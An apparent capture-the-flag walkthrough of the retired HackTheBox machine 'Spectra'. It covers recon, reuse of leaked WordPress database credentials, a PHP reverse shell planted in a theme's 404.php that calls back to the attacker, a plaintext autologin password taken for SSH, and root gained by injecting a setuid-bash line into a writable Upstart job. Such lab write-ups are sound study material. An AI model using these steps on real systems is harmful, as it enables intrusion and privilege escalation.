Spectra
Last updated
Was this helpful?
Last updated
Was this helpful?
Box Info
🔗 Name
🎯 Target IP
10.129.240.86
📈 Difficulty level
🟩Easy
⌛ Retire Date
26 Jun 2021
🐧OS
Linux
mkdir -p $HOME/htb/spectra/nmap
cd $HOME/htb/spectraStart Reconnaissance
# Fast full TCP port scan
nmap -p- --min-rate 10000 10.129.240.86Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-07 14:32 CEST
Nmap scan report for 10.129.240.86
Host is up (0.034s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
3306/tcp open mysql
Nmap done: 1 IP address (1 host up) scanned in 6.77 seconds# Scan open ports with default scripts and version detection
nmap -p 22,80,3306 -sC -sV -vv -oA nmap/spectra 10.129.240.86# Nmap 7.95 scan initiated Sat Jun 7 14:33:05 2025 as: /usr/lib/nmap/nmap --privileged -p 22,80,3306 -sC -sV -vv -oA nmap/spectra 10.129.240.86
Nmap scan report for 10.129.240.86
Host is up, received reset ttl 63 (0.035s latency).
Scanned at 2025-06-07 14:33:05 CEST for 39s
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.1 (protocol 2.0)
| ssh-hostkey:
| 4096 52:47:de:5c:37:4f:29:0e:8e:1d:88:6e:f9:23:4d:5a (RSA)
|_ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDF1xom8Ljz30NltgYXTRoVI2ymBlBZn849bnFYNKwDgwvW9naxom8pe9mzV+I8pAb5AHeVdok7szaIke7nXINK5GdHw+P529fkRNfmq4V63RUmYNKeAZmfGubCQDwGHP0Gj8S/C1lCMp/9kdNPxDv8aamWTeVCTuqDOwMy0GmEGRyk9gaZjwA2T3kIVD/TjLVu5hkpwdoQHr0JYhJRqLKHqZqdcZY7vqUFuECqcgVZ0Sj52/VnT5lis+N3hZK1MqJW2vlPhdlXhESF2O2Z0gzVtnAMB8yT68pbcRUbl6OI0NC6ucKzSIb6g90vwF1kVlj22GXTcfu0r3tyCFlusJFnuhgAIrTax8eQu5W+vLAAM0pbMizVNOEzd4VtBpLBHunEkzDknUZn3k9X3XP9NsIReMW+T8XiLTSxZuve8EWdaIfXoAeUlj0Tsy2iwYfLk6XaO5xssZgHFvB4QnUvpdt2ybsfTEd1aySikuetak9pl7yECFD8jgqT6ybzG1qsTMsdsJz6o871al1r0Dyd76R0Dr3+dO7AhLJtPszZHJXK3YqCqF/qU6kNIPMTIXdiVEuYQ1JieYzyjN3CivzVUPFnvOu2+dD5kFQSQNqR8kHGRqZXW0oUQsDUh1GQsb+iO8sFMDIAqr1SfAKQEpCPpSFl6H1wtNHW8pJJNwj1FkKNXw==
80/tcp open http syn-ack ttl 63 nginx 1.17.4
|_http-title: Site doesn't have a title (text/html).
| http-methods:
|_ Supported Methods: GET HEAD
|_http-server-header: nginx/1.17.4
3306/tcp open mysql syn-ack ttl 63 MySQL (unauthorized)
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jun 7 14:33:44 2025 -- 1 IP address (1 host up) scanned in 38.78 secondsVisiting the http://10.129.240.86/ webpage
# Webpage source code
<h1>Issue Tracking</h1>
<h2>Until IT set up the Jira we can configure and use this for issue tracking.</h2>
<h2><a href="http://spectra.htb/main/index.php" target="mine">Software Issue Tracker</a></h2>
<h2><a href="http://spectra.htb/testing/index.php" target="mine">Test</a></h2>http://spectra.htb/main/ is a WordPress site.
http://spectra.htb/testing/index.php has an error:
Error establishing a database connection
Add the found values to the /etc/hosts file
# e.g. adeguate with found values, hostnames, ffuf
sudo sh -c 'echo "10.129.240.86 spectra.htb" >> /etc/hosts' && ping -c 3 spectra.htb
# At the end of the box
# To clean up the last line from the /etc/hosts file
sudo sed -i '$ d' /etc/hostsRun ffuf to find the directories of the web server.
ffuf -u http://spectra.htb/FUZZ -w /usr/share/wordlists/dirb/common.txt [Status: 200, Size: 283, Words: 22, Lines: 7, Duration: 42ms]
index.html [Status: 200, Size: 283, Words: 22, Lines: 7, Duration: 33ms]
main [Status: 301, Size: 169, Words: 5, Lines: 8, Duration: 34ms]
testing [Status: 301, Size: 169, Words: 5, Lines: 8, Duration: 34ms]Let's browse http://spectra.htb/testing/ - file listing is enabled
Index of /testing/
../
wp-admin/ 10-Jun-2020 23:00 -
wp-content/ 10-Jun-2020 23:13 -
wp-includes/ 10-Jun-2020 23:13 -
index.php 06-Feb-2020 06:33 405
license.txt 10-Jun-2020 23:12 19915
readme.html 10-Jun-2020 23:12 7278
wp-activate.php 06-Feb-2020 06:33 6912
wp-blog-header.php 06-Feb-2020 06:33 351
wp-comments-post.php 02-Jun-2020 20:26 2332
wp-config.php 28-Oct-2020 05:52 2997
wp-config.php.save 29-Jun-2020 22:08 2888
wp-cron.php 06-Feb-2020 06:33 3940
wp-links-opml.php 06-Feb-2020 06:33 2496
wp-load.php 06-Feb-2020 06:33 3300
wp-login.php 10-Feb-2020 03:50 47874
wp-mail.php 14-Apr-2020 11:34 8509
wp-settings.php 10-Apr-2020 03:59 19396
wp-signup.php 06-Feb-2020 06:33 31111
wp-trackback.php 06-Feb-2020 06:33 4755
xmlrpc.php 06-Feb-2020 06:33 3133Download the files locally
# All files and subdirs
wget -r -np -nH --cut-dirs=1 -P testing/ http://spectra.htb/testing/grep -Ri administrator testing
# nothing important
grep -Ri password testing
cat testing/wp-config.php.save# MySQL DB Credentials
DB_NAME - dev
devtest:devteam01mysql -h spectra.htb -P 3306 -u devtest -p
# ERROR 2002 (HY000): Received error packet before completion of TLS handshake. The authenticity of the following error cannot be verified: 1130 - Host '10.10.14.5' is not allowed to connect to this MySQL serverTry the same password for the administrator user at the login page:
http://spectra.htb/main/wp-login.php
it works with administrator:devteam01
Run a WpScan (just for fun)
mkdir wpscan
wpscan --url=http://spectra.thb/main --enumerate u_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.28
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://spectra.htb/main/ [10.129.240.86]
[+] Started: Sat Jun 7 15:06:35 2025
Interesting Finding(s):
[+] Headers
| Interesting Entries:
| - Server: nginx/1.17.4
| - X-Powered-By: PHP/5.6.40
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://spectra.htb/main/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://spectra.htb/main/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://spectra.htb/main/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.4.2 identified (Insecure, released on 2020-06-10).
| Found By: Rss Generator (Passive Detection)
| - http://spectra.htb/main/?feed=rss2, <generator>https://wordpress.org/?v=5.4.2</generator>
| - http://spectra.htb/main/?feed=comments-rss2, <generator>https://wordpress.org/?v=5.4.2</generator>
[+] WordPress theme in use: twentytwenty
| Location: http://spectra.htb/main/wp-content/themes/twentytwenty/
| Last Updated: 2025-04-15T00:00:00.000Z
| Readme: http://spectra.htb/main/wp-content/themes/twentytwenty/readme.txt
| [!] The version is out of date, the latest version is 2.9
| Style URL: http://spectra.htb/main/wp-content/themes/twentytwenty/style.css?ver=1.2
| Style Name: Twenty Twenty
| Style URI: https://wordpress.org/themes/twentytwenty/
| Description: Our default theme for 2020 is designed to take full advantage of the flexibility of the block editor...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.2 (80% confidence)
| Found By: Style (Passive Detection)
| - http://spectra.htb/main/wp-content/themes/twentytwenty/style.css?ver=1.2, Match: 'Version: 1.2'
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:01 <=====================================================================================================================> (10 / 10) 100.00% Time: 00:00:01
[i] User(s) Identified:
[+] administrator
| Found By: Author Posts - Display Name (Passive Detection)
| Confirmed By:
| Rss Generator (Passive Detection)
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Sat Jun 7 15:06:42 2025
[+] Requests Done: 53
[+] Cached Requests: 6
[+] Data Sent: 13.271 KB
[+] Data Received: 378.852 KB
[+] Memory used: 188.043 MB
[+] Elapsed time: 00:00:06searchsploit worpress 5.4.2
Exploits: No Results
Shellcodes: No Results
Papers: No Results
https://www.hackingarticles.in/wordpress-reverse-shell/
To perform a reverse shell using a WordPress 404 page, follow these steps:
Log in to the WordPress admin panel and navigate to the theme editor
Take note of the current theme being edited. Let's use an inactive theme, e.g. Twenty Nineteen and locate the 404.php file within the theme's files
Replace the content of the 404.php file with a PHP reverse shell code. For example, you can use a simple bash reverse shell or the code from /usr/share/webshells/php/php-reverse-shell.php, modifying the IP address and port to match the attacker machine's details.
cp /usr/share/webshells/php/php-reverse-shell.php ./rev.php
subl ./rev.php
# Set
$ip = '10.10.14.5';
$port = 1234;
# Copy all the content and paste in the 404.phpOnce the 404.php file is updated with the reverse shell code, start a netcat listener on the attacker machine to receive the incoming connection. Access the modified 404.php page by navigating to the appropriate URL, such as
http://spectra.htb/main/wp-content/themes/twentynineteen/404.php
which will trigger the reverse shell.
rlwrap nc -nvlp 1234
# Open
# http://spectra.htb/main/wp-content/themes/twentynineteen/404.php# Got Reverse shell
connect to [10.10.14.5] from (UNKNOWN) [10.129.240.86] 37162
Linux spectra 5.4.66+ #1 SMP Tue Dec 22 13:39:49 UTC 2020 x86_64 AMD EPYC 7513 32-Core Processor AuthenticAMD GNU/Linux
07:21:57 up 8 min, 0 users, load average: 0.01, 0.13, 0.09
USER TTY LOGIN@ IDLE JCPU PCPU WHAT
uid=20155(nginx) gid=20156(nginx) groups=20156(nginx)
bash: cannot set terminal process group (4291): Inappropriate ioctl for device
bash: no job control in this shell
nginx@spectra / $ id
id
uid=20155(nginx) gid=20156(nginx) groups=20156(nginx)cat /etc/*rele*
BUILD_NUMBER=22
CHROMEOVER_BUILD_COMMIT=829e617e7b8467c355f9bd61f87835bfeb0da547
CHROMIUMOS_MANIFEST_COMMIT=38c4f6ca60a47f7fabf0fcd5d6feabf349e3f002
CHROMIUM_BROWSER_COMMIT=ef24d0b3349c2324d18a3f32bc35d14e796aeddc
PIPELINE_TAG=prod
USE_FLAGS=-cros-debug beerover virtualbox
GOOGLE_RELEASE=87.3.41
CHROMEOS_RELEASE_BRANCH_NUMBER=85
CHROMEOS_RELEASE_TRACK=stable-channel
CHROMEOS_RELEASE_KEYSET=devkeys
CHROMEOS_RELEASE_NAME=Chromium OS
CHROMEOS_AUSERVER=https://cloudready-free-update-server-2.neverware.com/update
CHROMEOS_RELEASE_BOARD=chromeover64
CHROMEOS_DEVSERVER=https://cloudready-free-update-server-2.neverware.com/
CHROMEOS_RELEASE_BUILD_NUMBER=13505
CHROMEOS_CANARY_APPID={90F229CE-83E2-4FAF-8479-E368A34938B1}
CHROMEOS_RELEASE_CHROME_MILESTONE=87
CHROMEOS_RELEASE_PATCH_NUMBER=2021_01_15_2352
CHROMEOS_RELEASE_APPID=87efface-864d-49a5-9bb3-4b050a7c227a
CHROMEOS_BOARD_APPID=87efface-864d-49a5-9bb3-4b050a7c227a
CHROMEOS_RELEASE_BUILD_TYPE=Developer Build - neverware
CHROMEOS_RELEASE_VERSION=87.3.41
CHROMEOS_RELEASE_DESCRIPTION=87.3.41 (Developer Build - neverware) stable-channel chromeover64
cat: /etc/wireless-regdb: Is a directoryls -lah /opt
cat /opt/autologin.conf.orig# Copyright 2016 The Chromium OS Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
description "Automatic login at boot"
author "chromium-os-dev@chromium.org"
# After boot-complete starts, the login prompt is visible and is accepting
# input.
start on started boot-complete
script
passwd=
# Read password from file. The file may optionally end with a newline.
for dir in /mnt/stateful_partition/etc/autologin /etc/autologin; do
if [ -e "${dir}/passwd" ]; then
passwd="$(cat "${dir}/passwd")"
break
fi
done
if [ -z "${passwd}" ]; then
exit 0
fi
# Inject keys into the login prompt.
#
# For this to work, you must have already created an account on the device.
# Otherwise, no login prompt appears at boot and the injected keys do the
# wrong thing.
/usr/local/sbin/inject-keys.py -s "${passwd}" -k enter
end scriptfind / -type f -iname passwd 2>/dev/null
/usr/share/baselayout/passwd
/usr/bin/passwd
/etc/passwd
/etc/autologin/passwd
/etc/pam.d/passwd
cat /etc/autologin/passwd
SummerHereWeCome!!cat /etc/passwd | grep -v false
root:x:0:0:root:/root:/bin/bash
chronos:x:1000:1000:system_user:/home/chronos/user:/bin/bash
nginx:x:20155:20156::/home/nginx:/bin/bash
katie:x:20156:20157::/home/katie:/bin/bashGet a shell as katie. SSH with katie:SummerHereWeCome!!
# From Kali
ssh katie@spectra.htb# User Flag
cat /home/katie/user.txt
e89d2***************************groups
katie developers
sudo -l
User katie may run the following commands on spectra:
(ALL) SETENV: NOPASSWD: /sbin/initctl/sbin/initctl is a control interface for the Upstart init system (used in some older Ubuntu and Debian systems, like Ubuntu ≤ 15.04). It manages services defined in /etc/init/*.conf. If you can write or modify an Upstart config file, you can escalate privileges.
sudo /sbin/initctl listfind / -type f -group developers 2>/dev/null -ls
ls -lah /etc/init/test.conf
-rw-rw---- 1 root developers 478 Jun 29 2020 /etc/init/test.conf
ls -lah /etc/init/*.conf | grep rw-rw
-rw-rw---- 1 root developers 478 Jun 29 2020 /etc/init/test.confSince katie is in the developers groups, katie can modify the test.conf service
sudo /sbin/initctl stop test
vim /etc/init/test.conf
# Under "script" add the following line
chmod +s /bin/bash
# Run the service
sudo /sbin/initctl start testGet a shell as root:
/bin/bash -pbash-4.3# id
uid=20156(katie) gid=20157(katie) euid=0(root) egid=0(root) groups=0(root),20157(katie),20158(developers)cat /root/root.txt
d4451***************************cat script.shsudo mount -o rw,remount /
rm -f /usr/local/data/ib_logfile*
/usr/sbin/sshd
startnginx
/usr/local/bin/php5-fpm start
/usr/local/bin/mysqld_safe --bind-address=0.0.0.0 --user=chronos &
/usr/local/bin/vmtoolsd &
for i in {1..10};
do
iptables -F
iptables -X
iptables -t nat -F
iptables -t nat -X
iptables -t mangle -F
iptables -t mangle -X
iptables -P INPUT ACCEPT
iptables -P FORWARD ACCEPT
iptables -P OUTPUT ACCEPT
stop powerd
sleep 15
done
stop ui
i=0
while true;
do
i=$((i+1))
sleep 60
/bin/cp -p /root/test.conf /etc/init/test.conf
/bin/cp -p /root/test.conf /etc/init/test1.conf
/bin/cp -p /root/test.conf /etc/init/test2.conf
/bin/cp -p /root/test.conf /etc/init/test3.conf
/bin/cp -p /root/test.conf /etc/init/test4.conf
/bin/cp -p /root/test.conf /etc/init/test5.conf
/bin/cp -p /root/test.conf /etc/init/test6.conf
/bin/cp -p /root/test.conf /etc/init/test7.conf
/bin/cp -p /root/test.conf /etc/init/test8.conf
/bin/cp -p /root/test.conf /etc/init/test9.conf
/bin/cp -p /root/test.conf /etc/init/test10.conf
/bin/cp -p /root/nodetest.js /srv/nodetest.js
if [[ "$i" -gt 10 ]]; then
i=0
/bin/rm -rf /usr/local/share/nginx/html/main/
/bin/cp -rp /root/main /usr/local/share/nginx/html/
fi
done
